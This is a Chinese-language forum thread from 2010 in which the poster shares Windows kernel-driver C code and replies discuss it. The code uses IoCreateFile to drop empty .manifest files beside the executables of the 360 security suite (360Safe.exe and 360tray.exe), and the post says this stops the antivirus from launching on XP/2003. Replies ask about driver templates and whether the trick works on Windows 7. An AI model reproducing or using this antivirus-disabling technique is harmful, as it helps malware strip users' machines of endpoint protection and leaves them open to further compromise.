使用IoCreateFile创建文件禁止360启动 - HdHijack360
本帖最后由 HoviDelphic 于 2010-5-2 11:03 编辑创建.manifest文件,可以在XP/03下阻止程序启动。
NTKERNELAPI NTSTATUS IoCreateFile
(
__outPHANDLE FileHandle,
__inACCESS_MASK DesiredAccess,
__inPOBJECT_ATTRIBUTES ObjectAttributes,
__outPIO_STATUS_BLOCK IoStatusBlock,
__in_opt PLARGE_INTEGER AllocationSize,
__inULONG FileAttributes,
__inULONG ShareAccess,
__inULONG CreateDisposition,
__inULONG CreateOptions,
__inPVOID EaBuffer,
__in_opt ULONG EaLength,
__inCREATE_FILE_TYPE CreateFileType,
__inPVOID InternalParameters,
__inULONG Options
);
VOID DrvCreateFile(UNICODE_STRING *pusFilePath)
{
HANDLE hfile;
IO_STATUS_BLOCK IoSB;
OBJECT_ATTRIBUTES ObjA;
InitializeObjectAttributes(&ObjA,pusFilePath,OBJ_CASE_INSENSITIVE,NULL,NULL);
IoCreateFile(&hfile,
GENERIC_WRITE,
&ObjA,
&IoSB,
NULL,
FILE_ATTRIBUTE_NORMAL,
0,
FILE_OPEN_IF,
FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0,
0,
NULL,
IO_NO_PARAMETER_CHECKING);
ZwClose(hfile);
}
VOID Fuck360()
{
UNICODE_STRING make;
RtlInitUnicodeString(&make,L"\\??\\C:\\Program Files\\360\\360safe\\360Safe.exe.manifest");
DrvCreateFile(&make);
RtlInitUnicodeString(&make,L"\\??\\C:\\Program Files\\360\\360safe\\safemon\\360tray.exe.manifest");
DrvCreateFile(&make);
}
请问那些头文件就直接用楼主的驱动模板就可以了吧!
嘿嘿····· 驱动模板准备更新了…… 回复 3# HoviDelphic
期待你的新版本! 回复 4# shixiaoxu
http://www.m5home.com/bbs/thread-3376-1-1.html 不知能不能在Win7下创建Con文件 楼主太牛了,顶
页:
[1]